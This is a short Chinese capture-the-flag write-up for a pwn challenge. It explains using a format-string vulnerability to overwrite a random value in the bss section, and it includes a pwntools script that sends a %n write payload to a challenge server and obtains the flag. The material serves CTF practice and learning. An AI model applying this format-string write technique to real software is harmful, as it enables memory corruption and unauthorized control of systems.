前言
今年国赛线下awdp,逆向手坐牢,临时抱佛脚吧
代码分析
检查文件开启了金丝雀
那也就是不能产生溢出,看师傅们大多用的格式符漏洞
看着比逆向清晰多了,生成了一个随机数,然后进行判断,随机数被保存在bss的0x804c044位置,占四个字节,所以思路就是将这个位置替换成固定的值,所以需要用到%i$n格式符
- i$对以当前esp,即函数ebp指向帧为基址,对偏移i处进行操作
- %n对指定参数,通常为指针,所指向地址写入值
判定输入偏移
采用%p的原因是%p刚好符合一帧的大小,可以输出当前esp上的所有帧
由于AAAA位于v7首地址处,后面的字符也是随着向高地址移动,所以输入改变不会影响v7所处位置,始终为偏移10处
wp
from pwn import *
p=remote("node4.buuoj.cn",27407)
bss=0x0804c044
#payload=b"AAAA%16$n%17$n%18$n%19$n"+p32(bss)+p32(bss+1)+p32(bss+2)+p32(bss+3)
payload =p32(bss) + p32(bss+1) + p32(bss+2) + p32(bss+3) + b'%10$n%11$n%12$n%13$n'
p.sendline(payload)
#p.sendline(str(0x04040404))
p.sendline(str(0x10101010))
p.interactive()
flag{60679b51-1b89-44dd-ae4d-e67ebe3dac28}